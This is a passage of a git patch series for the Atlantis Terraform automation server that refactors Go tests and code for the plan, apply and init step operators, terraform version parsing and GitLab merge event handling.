-          extra_args: [arg3, arg4]
-      - run: postrun
-`), 0644)
-	Ok(t, err)
-
-	repoDir := tmpDir
-	log := logging.NewNoopLogger()
-	workspace := "myworkspace"
-	// Our config is for '.' so there will be no config for this project.
-	relProjectPath := "mydir"
-	var extraCommentArgs []string
-	username := "myuser"
-	meta := runtime.StepMeta{
-		Log:                   log,
-		Workspace:             workspace,
-		AbsolutePath:          filepath.Join(repoDir, relProjectPath),
-		DirRelativeToRepoRoot: relProjectPath,
-		TerraformVersion:      defaultTFVersion,
-		TerraformExecutor:     terraformExecutor,
-		ExtraCommentArgs:      extraCommentArgs,
-		Username:              username,
-	}
-
-	t.Run("plan stage for project without config", func(t *testing.T) {
-		// This project isn't listed so it should get the defaults.
-		planStage, err := e.BuildPlanStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-		Ok(t, err)
-		Equals(t, runtime.PlanStage{
-			Steps: []runtime.Step{
-				&runtime.InitStep{
-					Meta: meta,
-				},
-				&runtime.PlanStep{
-					Meta: meta,
-				},
-			},
-		}, planStage)
-	})
-
-	t.Run("apply stage for project without config", func(t *testing.T) {
-		// This project isn't listed so it should get the defaults.
-		applyStage, err := e.BuildApplyStage(log, repoDir, workspace, relProjectPath, extraCommentArgs, username)
-		Ok(t, err)
-		Equals(t, runtime.ApplyStage{
-			Steps: []runtime.Step{
-				&runtime.ApplyStep{
-					Meta: meta,
-				},
-			},
-		}, *applyStage)
-	})
-
-	// Create the meta for the custom project.
-	customMeta := meta
-	customMeta.Workspace = "default"
-	customMeta.DirRelativeToRepoRoot = "."
-	customMeta.AbsolutePath = tmpDir
-
-	t.Run("plan stage for custom config", func(t *testing.T) {
-		planStage, err := e.BuildPlanStage(log, repoDir, "default", ".", extraCommentArgs, username)
-		Ok(t, err)
-
-		Equals(t, runtime.PlanStage{
-			Steps: []runtime.Step{
-				&runtime.InitStep{
-					Meta:      customMeta,
-					ExtraArgs: []string{"arg1", "arg2"},
-				},
-				&runtime.PlanStep{
-					Meta: customMeta,
-				},
-				&runtime.RunStep{
-					Meta:     customMeta,
-					Commands: []string{"echo", "hi"},
-				},
-			},
-		}, planStage)
-	})
-
-	t.Run("apply stage for custom config", func(t *testing.T) {
-		planStage, err := e.BuildApplyStage(log, repoDir, "default", ".", extraCommentArgs, username)
-		Ok(t, err)
-
-		Equals(t, runtime.ApplyStage{
-			Steps: []runtime.Step{
-				&runtime.RunStep{
-					Meta:     customMeta,
-					Commands: []string{"prerun"},
-				},
-				&runtime.ApplyStep{
-					Meta:      customMeta,
-					ExtraArgs: []string{"arg3", "arg4"},
-				},
-				&runtime.RunStep{
-					Meta:     customMeta,
-					Commands: []string{"postrun"},
-				},
-			},
-		}, *planStage)
-	})
-}
diff --git a/server/events/runtime/apply_step_operator_test.go b/server/events/runtime/apply_step_operator_test.go
index 862f5e10e5..1aad3c9e23 100644
--- a/server/events/runtime/apply_step_operator_test.go
+++ b/server/events/runtime/apply_step_operator_test.go
@@ -8,42 +8,35 @@ import (
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	. "github.com/runatlantis/atlantis/testing"
 )
 
 func TestRun_NoDir(t *testing.T) {
-	s := runtime.ApplyStep{
-		Meta: runtime.StepMeta{
-			Workspace:             "workspace",
-			AbsolutePath:          "nonexistent/path",
-			DirRelativeToRepoRoot: ".",
-			TerraformVersion:      nil,
-			ExtraCommentArgs:      nil,
-			Username:              "username",
-		},
+	o := runtime.ApplyStepOperator{
+		TerraformExecutor: nil,
 	}
-	_, err := s.Run()
+	_, err := o.Run(models.ProjectCommandContext{
+		RepoRelPath: ".",
+		Workspace:   "workspace",
+	}, nil, "/nonexistent/path")
 	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
 }
 
 func TestRun_NoPlanFile(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
-
-	s := runtime.ApplyStep{
-		Meta: runtime.StepMeta{
-			Workspace:             "workspace",
-			AbsolutePath:          tmpDir,
-			DirRelativeToRepoRoot: ".",
-			TerraformVersion:      nil,
-			ExtraCommentArgs:      nil,
-			Username:              "username",
-		},
+	o := runtime.ApplyStepOperator{
+		TerraformExecutor: nil,
 	}
-	_, err := s.Run()
+	_, err := o.Run(models.ProjectCommandContext{
+		RepoRelPath: ".",
+		Workspace:   "workspace",
+	}, nil, tmpDir)
 	ErrEquals(t, "no plan found at path \".\" and workspace \"workspace\"–did you run plan?", err)
 }
 
@@ -56,24 +49,46 @@ func TestRun_Success(t *testing.T) {
 
 	RegisterMockTestingT(t)
 	terraform := mocks.NewMockClient()
+	o := runtime.ApplyStepOperator{
+		TerraformExecutor: terraform,
+	}
 
-	tfVersion, _ := version.NewVersion("0.11.4")
-	s := runtime.ApplyStep{
-		Meta: runtime.StepMeta{
-			Workspace:             "workspace",
-			AbsolutePath:          tmpDir,
-			DirRelativeToRepoRoot: ".",
-			TerraformExecutor:     terraform,
-			TerraformVersion:      tfVersion,
-			ExtraCommentArgs:      []string{"comment", "args"},
-			Username:              "username",
-		},
-		ExtraArgs: []string{"extra", "args"},
+	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+		ThenReturn("output", nil)
+	output, err := o.Run(models.ProjectCommandContext{
+		Workspace:   "workspace",
+		RepoRelPath: ".",
+		CommentArgs: []string{"comment", "args"},
+	}, []string{"extra", "args"}, tmpDir)
+	Ok(t, err)
+	Equals(t, "output", output)
+	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, nil, "workspace")
+}
+
+func TestRun_UsesConfiguredTFVersion(t *testing.T) {
+	tmpDir, cleanup := TempDir(t)
+	defer cleanup()
+	planPath := filepath.Join(tmpDir, "workspace.tfplan")
+	err := ioutil.WriteFile(planPath, nil, 0644)
+	Ok(t, err)
+
+	RegisterMockTestingT(t)
+	terraform := mocks.NewMockClient()
+	o := runtime.ApplyStepOperator{
+		TerraformExecutor: terraform,
 	}
+	tfVersion, _ := version.NewVersion("0.11.0")
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 		ThenReturn("output", nil)
-	output, err := s.Run()
+	output, err := o.Run(models.ProjectCommandContext{
+		Workspace:   "workspace",
+		RepoRelPath: ".",
+		CommentArgs: []string{"comment", "args"},
+		ProjectConfig: &valid.Project{
+			TerraformVersion: tfVersion,
+		},
+	}, []string{"extra", "args"}, tmpDir)
 	Ok(t, err)
 	Equals(t, "output", output)
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(nil, tmpDir, []string{"apply", "-no-color", "extra", "args", "comment", "args", planPath}, tfVersion, "workspace")
diff --git a/server/events/runtime/init_step_operator_test.go b/server/events/runtime/init_step_operator_test.go
index 8296394977..efbf4ca283 100644
--- a/server/events/runtime/init_step_operator_test.go
+++ b/server/events/runtime/init_step_operator_test.go
@@ -3,9 +3,10 @@ package runtime_test
 import (
 	"testing"
 
-	"github.com/hashicorp/go-version"
+	version "github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
@@ -45,15 +46,16 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 			logger := logging.NewNoopLogger()
 			iso := runtime.InitStepOperator{
 				TerraformExecutor: terraform,
+				DefaultTFVersion:  tfVersion,
 			}
 			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 				ThenReturn("output", nil)
-			output, err := iso.Run(runtime.ProjectCommandContext{
+
+			output, err := iso.Run(models.ProjectCommandContext{
 				Log:         logger,
 				Workspace:   "workspace",
-				AbsPath:     "/path",
 				RepoRelPath: ".",
-			}, []string{"extra", "args"})
+			}, []string{"extra", "args"}, "/path")
 			Ok(t, err)
 			// Shouldn't return output since we don't print init output to PR.
 			Equals(t, "", output)
diff --git a/server/events/runtime/plan_step_operater_test.go b/server/events/runtime/plan_step_operater_test.go
index 53b45c2e64..bf80927b6d 100644
--- a/server/events/runtime/plan_step_operater_test.go
+++ b/server/events/runtime/plan_step_operater_test.go
@@ -1,7 +1,6 @@
 package runtime_test
 
 import (
-	"errors"
 	"io/ioutil"
 	"os"
 	"path/filepath"
@@ -9,7 +8,9 @@ import (
 
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
+	"github.com/runatlantis/atlantis/server/events/models"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/runtime"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
@@ -25,23 +26,20 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "default"
-	s := runtime.PlanStep{
-		Meta: runtime.StepMeta{
-			Log:                   logger,
-			Workspace:             workspace,
-			AbsolutePath:          "/path",
-			DirRelativeToRepoRoot: ".",
-			TerraformExecutor:     terraform,
-			TerraformVersion:      tfVersion,
-			ExtraCommentArgs:      []string{"comment", "args"},
-			Username:              "username",
-		},
-		ExtraArgs: []string{"extra", "args"},
+	s := runtime.PlanStepOperator{
+		DefaultTFVersion:  tfVersion,
+		TerraformExecutor: terraform,
 	}
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 		ThenReturn("output", nil)
-	output, err := s.Run()
+	output, err := s.Run(models.ProjectCommandContext{
+		Log:         logger,
+		CommentArgs: []string{"comment", "args"},
+		Workspace:   workspace,
+		RepoRelPath: ".",
+		User:        models.User{Username: "username"},
+	}, []string{"extra", "args"}, "/path")
 	Ok(t, err)
 
 	Equals(t, "output", output)
@@ -61,23 +59,19 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "notdefault"
-	s := runtime.PlanStep{
-		Meta: runtime.StepMeta{
-			Log:                   logger,
-			Workspace:             workspace,
-			AbsolutePath:          "/path",
-			DirRelativeToRepoRoot: ".",
-			TerraformExecutor:     terraform,
-			TerraformVersion:      tfVersion,
-			ExtraCommentArgs:      []string{"comment", "args"},
-			Username:              "username",
-		},
-		ExtraArgs: []string{"extra", "args"},
+	s := runtime.PlanStepOperator{
+		TerraformExecutor: terraform,
+		DefaultTFVersion:  tfVersion,
 	}
 
 	When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 		ThenReturn("output", nil)
-	_, err := s.Run()
+	_, err := s.Run(models.ProjectCommandContext{
+		Log:         logger,
+		Workspace:   workspace,
+		RepoRelPath: ".",
+		User:        models.User{Username: "username"},
+	}, []string{"extra", "args"}, "/path")
 	ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err)
 }
 
@@ -112,23 +106,21 @@ func TestRun_SwitchesWorkspace(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := runtime.PlanStep{
-				Meta: runtime.StepMeta{
-					Log:                   logger,
-					Workspace:             "workspace",
-					AbsolutePath:          "/path",
-					DirRelativeToRepoRoot: ".",
-					TerraformExecutor:     terraform,
-					TerraformVersion:      tfVersion,
-					ExtraCommentArgs:      []string{"comment", "args"},
-					Username:              "username",
-				},
-				ExtraArgs: []string{"extra", "args"},
+
+			s := runtime.PlanStepOperator{
+				TerraformExecutor: terraform,
+				DefaultTFVersion:  tfVersion,
 			}
 
 			When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
 				ThenReturn("output", nil)
-			output, err := s.Run()
+			output, err := s.Run(models.ProjectCommandContext{
+				Log:         logger,
+				Workspace:   "workspace",
+				RepoRelPath: ".",
+				User:        models.User{Username: "username"},
+				CommentArgs: []string{"comment", "args"},
+			}, []string{"extra", "args"}, "/path")
 			Ok(t, err)
 
 			Equals(t, "output", output)
@@ -170,18 +162,9 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			terraform := mocks.NewMockClient()
 			tfVersion, _ := version.NewVersion(c.tfVersion)
 			logger := logging.NewNoopLogger()
-			s := runtime.PlanStep{
-				Meta: runtime.StepMeta{
-					Log:                   logger,
-					Workspace:             "workspace",
-					AbsolutePath:          "/path",
-					DirRelativeToRepoRoot: ".",
-					TerraformExecutor:     terraform,
-					TerraformVersion:      tfVersion,
-					ExtraCommentArgs:      []string{"comment", "args"},
-					Username:              "username",
-				},
-				ExtraArgs: []string{"extra", "args"},
+			s := runtime.PlanStepOperator{
+				TerraformExecutor: terraform,
+				DefaultTFVersion:  tfVersion,
 			}
 
 			// Ensure that we actually try to switch workspaces by making the
@@ -194,7 +177,13 @@ func TestRun_CreatesWorkspace(t *testing.T) {
 			expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
 			When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
 
-			output, err := s.Run()
+			output, err := s.Run(models.ProjectCommandContext{
+				Log:         logger,
+				Workspace:   "workspace",
+				RepoRelPath: ".",
+				User:        models.User{Username: "username"},
+				CommentArgs: []string{"comment", "args"},
+			}, []string{"extra", "args"}, "/path")
 			Ok(t, err)
 
 			Equals(t, "output", output)
@@ -212,26 +201,22 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
 	terraform := mocks.NewMockClient()
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := runtime.PlanStep{
-		Meta: runtime.StepMeta{
-			Log:                   logger,
-			Workspace:             "workspace",
-			AbsolutePath:          "/path",
-			DirRelativeToRepoRoot: ".",
-			TerraformExecutor:     terraform,
-			TerraformVersion:      tfVersion,
-			ExtraCommentArgs:      []string{"comment", "args"},
-			Username:              "username",
-		},
-		ExtraArgs: []string{"extra", "args"},
+	s := runtime.PlanStepOperator{
+		TerraformExecutor: terraform,
+		DefaultTFVersion:  tfVersion,
 	}
-
 	When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
 
 	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
 	When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
 
-	output, err := s.Run()
+	output, err := s.Run(models.ProjectCommandContext{
+		Log:         logger,
+		Workspace:   "workspace",
+		RepoRelPath: ".",
+		User:        models.User{Username: "username"},
+		CommentArgs: []string{"comment", "args"},
+	}, []string{"extra", "args"}, "/path")
 	Ok(t, err)
 
 	Equals(t, "output", output)
@@ -258,28 +243,25 @@ func TestRun_AddsEnvVarFile(t *testing.T) {
 	// Using version >= 0.10 here so we don't expect any env commands.
 	tfVersion, _ := version.NewVersion("0.10.0")
 	logger := logging.NewNoopLogger()
-	s := runtime.PlanStep{
-		Meta: runtime.StepMeta{
-			Log:                   logger,
-			Workspace:             "workspace",
-			AbsolutePath:          tmpDir,
-			DirRelativeToRepoRoot: ".",
-			TerraformExecutor:     terraform,
-			TerraformVersion:      tfVersion,
-			ExtraCommentArgs:      []string{"comment", "args"},
-			Username:              "username",
-		},
-		ExtraArgs: []string{"extra", "args"},
+	s := runtime.PlanStepOperator{
+		TerraformExecutor: terraform,
+		DefaultTFVersion:  tfVersion,
 	}
 
 	expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile}
 	When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
 
-	output, err := s.Run()
+	output, err := s.Run(models.ProjectCommandContext{
+		Log:         logger,
+		Workspace:   "workspace",
+		RepoRelPath: ".",
+		User:        models.User{Username: "username"},
+		CommentArgs: []string{"comment", "args"},
+	}, []string{"extra", "args"}, tmpDir)
 	Ok(t, err)
 
-	Equals(t, "output", output)
 	// Verify that env select was never called since we're in version >= 0.10
 	terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace")
 	terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")
+	Equals(t, "output", output)
 }
diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go
index 51fa1ca702..15bcd19602 100644
--- a/server/events/yaml/parser_validator_test.go
+++ b/server/events/yaml/parser_validator_test.go
@@ -6,6 +6,7 @@ import (
 	"path/filepath"
 	"testing"
 
+	"github.com/hashicorp/go-version"
 	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	. "github.com/runatlantis/atlantis/testing"
@@ -72,6 +73,7 @@ func TestReadConfig_UnmarshalErrors(t *testing.T) {
 }
 
 func TestReadConfig(t *testing.T) {
+	tfVersion, _ := version.NewVersion("v0.11.0")
 	cases := []struct {
 		description string
 		input       string
@@ -169,7 +171,7 @@ workflows:
 						Dir:              ".",
 						Workspace:        "myworkspace",
 						Workflow:         String("myworkflow"),
-						TerraformVersion: String("v0.11.0"),
+						TerraformVersion: tfVersion,
 						Autoplan: valid.Autoplan{
 							WhenModified: []string{"**/*.tf"},
 							Enabled:      true,
@@ -203,7 +205,7 @@ workflows:
 						Dir:              ".",
 						Workspace:        "myworkspace",
 						Workflow:         String("myworkflow"),
-						TerraformVersion: String("v0.11.0"),
+						TerraformVersion: tfVersion,
 						Autoplan: valid.Autoplan{
 							WhenModified: []string{"**/*.tf"},
 							Enabled:      false,
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
index 3273cb38a1..29335e7954 100644
--- a/server/events/yaml/raw/project.go
+++ b/server/events/yaml/raw/project.go
@@ -1,12 +1,12 @@
 package raw
 
 import (
-	"errors"
 	"fmt"
 	"strings"
 
 	"github.com/go-ozzo/ozzo-validation"
 	"github.com/hashicorp/go-version"
+	"github.com/pkg/errors"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 )
 
@@ -41,11 +41,12 @@ func (p Project) Validate() error {
 		return nil
 	}
 	validTFVersion := func(value interface{}) error {
-		// Safe to dereference because this is only called if the pointer is
-		// not nil.
-		versionStr := *value.(*string)
-		_, err := version.NewVersion(versionStr)
-		return err
+		strPtr := value.(*string)
+		if strPtr == nil {
+			return nil
+		}
+		_, err := version.NewVersion(*strPtr)
+		return errors.Wrapf(err, "version %q could not be parsed", *strPtr)
 	}
 	return validation.ValidateStruct(&p,
 		validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)),
diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go
index 9c06914896..b10452afeb 100644
--- a/server/events/yaml/raw/project_test.go
+++ b/server/events/yaml/raw/project_test.go
@@ -4,6 +4,7 @@ import (
 	"testing"
 
 	"github.com/go-ozzo/ozzo-validation"
+	"github.com/hashicorp/go-version"
 	"github.com/runatlantis/atlantis/server/events/yaml/raw"
 	"github.com/runatlantis/atlantis/server/events/yaml/valid"
 	. "github.com/runatlantis/atlantis/testing"
@@ -107,6 +108,30 @@ func TestProject_Validate(t *testing.T) {
 			},
 			expErr: "",
 		},
+		{
+			description: "empty tf version string",
+			input: raw.Project{
+				Dir:              String("."),
+				TerraformVersion: String(""),
+			},
+			expErr: "terraform_version: version \"\" could not be parsed: Malformed version: .",
+		},
+		{
+			description: "tf version with v prepended",
+			input: raw.Project{
+				Dir:              String("."),
+				TerraformVersion: String("v1"),
+			},
+			expErr: "",
+		},
+		{
+			description: "tf version without prepended",
+			input: raw.Project{
+				Dir:              String("."),
+				TerraformVersion: String("1"),
+			},
+			expErr: "",
+		},
 	}
 	validation.ErrorTag = "yaml"
 	for _, c := range cases {
@@ -122,6 +147,7 @@ func TestProject_Validate(t *testing.T) {
 }
 
 func TestProject_ToValid(t *testing.T) {
+	tfVersionPointEleven, _ := version.NewVersion("v0.11.0")
 	cases := []struct {
 		description string
 		input       raw.Project
@@ -161,7 +187,7 @@ func TestProject_ToValid(t *testing.T) {
 				Dir:              ".",
 				Workspace:        "myworkspace",
 				Workflow:         String("myworkflow"),
-				TerraformVersion: String("v0.11.0"),
+				TerraformVersion: tfVersionPointEleven,
 				Autoplan: valid.Autoplan{
 					WhenModified: []string{"hi"},
 					Enabled:      false,
@@ -169,6 +195,22 @@ func TestProject_ToValid(t *testing.T) {
 				ApplyRequirements: []string{"approved"},
 			},
 		},
+		{
+			description: "tf version without 'v'",
+			input: raw.Project{
+				Dir:              String("."),
+				TerraformVersion: String("0.11.0"),
+			},
+			exp: valid.Project{
+				Dir:              ".",
+				Workspace:        "default",
+				TerraformVersion: tfVersionPointEleven,
+				Autoplan: valid.Autoplan{
+					WhenModified: []string{"**/*.tf"},
+					Enabled:      true,
+				},
+			},
+		},
 	}
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {
diff --git a/server/events_controller_test.go b/server/events_controller_test.go
index 7997a56d8a..bb0682ba6f 100644
--- a/server/events_controller_test.go
+++ b/server/events_controller_test.go
@@ -293,31 +293,6 @@ func TestPost_GithubCommentSuccess(t *testing.T) {
 	cr.VerifyWasCalledOnce().ExecuteCommand(baseRepo, baseRepo, user, 1, &cmd)
 }
 
-func TestPost_GithubPullRequestNotClosed(t *testing.T) {
-	t.Log("when the event is a github pull reuqest but it's not a closed event we ignore it")
-	e, v, _, _, _, _, _, _ := setup(t)
-	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
-	req.Header.Set(githubHeader, "pull_request")
-	event := `{"action": "opened"}`
-	When(v.Validate(req, secret)).ThenReturn([]byte(event), nil)
-	w := httptest.NewRecorder()
-	e.Post(w, req)
-	responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
-}
-
-func TestPost_GitlabMergeRequestNotClosed(t *testing.T) {
-	t.Log("when the event is a gitlab merge request but it's not a closed event we ignore it")
-	e, _, gl, p, _, _, _, _ := setup(t)
-	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
-	req.Header.Set(gitlabHeader, "value")
-	event := gitlab.MergeEvent{}
-	When(gl.Validate(req, secret)).ThenReturn(event, nil)
-	When(p.ParseGitlabMergeEvent(event)).ThenReturn(models.PullRequest{State: models.Open}, models.Repo{}, nil)
-	w := httptest.NewRecorder()
-	e.Post(w, req)
-	responseContains(t, w, http.StatusOK, "Ignoring opened pull request event")
-}
-
 func TestPost_GithubPullRequestInvalid(t *testing.T) {
 	t.Log("when the event is a github pull request with invalid data we return a 400")
 	e, v, _, p, _, _, _, _ := setup(t)
@@ -383,15 +358,14 @@ func TestPost_GithubPullRequestErrCleaningPull(t *testing.T) {
 }
 
 func TestPost_GitlabMergeRequestErrCleaningPull(t *testing.T) {
-	t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 503")
+	t.Log("when the event is a gitlab merge request and an error occurs calling CleanUpPull we return a 500")
 	e, _, gl, p, _, c, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	event := gitlab.MergeEvent{}
-	When(gl.Validate(req, secret)).ThenReturn(event, nil)
+	When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
-	When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
 	When(c.CleanUpPull(repo, pullRequest)).ThenReturn(errors.New("err"))
 	w := httptest.NewRecorder()
 	e.Post(w, req)
@@ -421,11 +395,10 @@ func TestPost_GitlabMergeRequestSuccess(t *testing.T) {
 	e, _, gl, p, _, _, _, _ := setup(t)
 	req, _ := http.NewRequest("GET", "", bytes.NewBuffer(nil))
 	req.Header.Set(gitlabHeader, "value")
-	event := gitlab.MergeEvent{}
-	When(gl.Validate(req, secret)).ThenReturn(event, nil)
+	When(gl.Validate(req, secret)).ThenReturn(gitlabMergeEvent, nil)
 	repo := models.Repo{}
 	pullRequest := models.PullRequest{State: models.Closed}
-	When(p.ParseGitlabMergeEvent(event)).ThenReturn(pullRequest, repo, nil)
+	When(p.ParseGitlabMergeEvent(gitlabMergeEvent)).ThenReturn(pullRequest, repo, repo, nil)
 	w := httptest.NewRecorder()
 	e.Post(w, req)
 	responseContains(t, w, http.StatusOK, "Pull request cleaned successfully")
@@ -458,3 +431,60 @@ func setup(t *testing.T) (server.EventsController, *mocks.MockGithubRequestValid
 	}
 	return e, v, gl, p, cr, c, vcsmock, cp
 }
+
+var gitlabMergeEvent = gitlab.MergeEvent{
+	ObjectAttributes: struct {
+		ID              int              `json:"id"`
+		TargetBranch    string           `json:"target_branch"`
+		SourceBranch    string           `json:"source_branch"`
+		SourceProjectID int              `json:"source_project_id"`
+		AuthorID        int              `json:"author_id"`
+		AssigneeID      int              `json:"assignee_id"`
+		Title           string           `json:"title"`
+		CreatedAt       string           `json:"created_at"`
+		UpdatedAt       string           `json:"updated_at"`
+		StCommits       []*gitlab.Commit `json:"st_commits"`
+		StDiffs         []*gitlab.Diff   `json:"st_diffs"`
+		MilestoneID     int              `json:"milestone_id"`
+		State           string           `json:"state"`
+		MergeStatus     string           `json:"merge_status"`
+		TargetProjectID int              `json:"target_project_id"`
+		IID             int              `json:"iid"`
+		Description     string           `json:"description"`
+		Position        int              `json:"position"`
+		LockedAt        string           `json:"locked_at"`
+		UpdatedByID     int              `json:"updated_by_id"`
+		MergeError      string           `json:"merge_error"`
+		MergeParams     struct {
+			ForceRemoveSourceBranch string `json:"force_remove_source_branch"`
+		} `json:"merge_params"`
+		MergeWhenBuildSucceeds   bool               `json:"merge_when_build_succeeds"`
+		MergeUserID              int                `json:"merge_user_id"`
+		MergeCommitSha           string             `json:"merge_commit_sha"`
+		DeletedAt                string             `json:"deleted_at"`
+		ApprovalsBeforeMerge     string             `json:"approvals_before_merge"`
+		RebaseCommitSha          string             `json:"rebase_commit_sha"`
+		InProgressMergeCommitSha string             `json:"in_progress_merge_commit_sha"`
+		LockVersion              int                `json:"lock_version"`
+		TimeEstimate             int                `json:"time_estimate"`
+		Source                   *gitlab.Repository `json:"source"`
+		Target                   *gitlab.Repository `json:"target"`
+		LastCommit               struct {
+			ID        string         `json:"id"`
+			Message   string         `json:"message"`
+			Timestamp *time.Time     `json:"timestamp"`
+			URL       string         `json:"url"`
+			Author    *gitlab.Author `json:"author"`
+		} `json:"last_commit"`
+		WorkInProgress bool   `json:"work_in_progress"`
+		URL            string `json:"url"`
+		Action         string `json:"action"`
+		Assignee       struct {
+			Name      string `json:"name"`
+			Username  string `json:"username"`
+			AvatarURL string `json:"avatar_url"`
+		} `json:"assignee"`
+	}{
+		Action: "merge",
+	},
+}
diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go
index eca5778e4f..ddb56ebcd4 100644
--- a/server/logging/simple_logger.go
+++ b/server/logging/simple_logger.go
@@ -23,8 +23,6 @@ import (
 	"unicode"
 )
 
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging
-
 // SimpleLogging is the interface that our SimpleLogger implements.
 // It's really only used for mocking when we need to test what's being logged.
 type SimpleLogging interface {
diff --git a/server/server.go b/server/server.go
index fe6e3f7b5f..734a36de4d 100644
--- a/server/server.go
+++ b/server/server.go
@@ -232,7 +232,7 @@ func NewServer(userConfig UserConfig, config Config) (*Server, error) {
 		Logger:                   logger,
 		AllowForkPRs:             userConfig.AllowForkPRs,
 		AllowForkPRsFlag:         config.AllowForkPRsFlag,
-		PullRequestOperator: events.PullRequestOperator{
+		PullRequestOperator: &events.DefaultPullRequestOperator{
 			TerraformExecutor: terraformClient,
 			DefaultTFVersion:  defaultTfVersion,
 			ParserValidator:   &yaml.ParserValidator{},

From e97b98e4a04c71c5b2d1f7ef3a215e22a40d0cca Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Fri, 15 Jun 2018 17:52:14 +0100
Subject: [PATCH 23/69] Add first e2e test with mocks.

---
 server/events/project_operator.go             |   7 +-
 server/events_controller.go                   |  14 +-
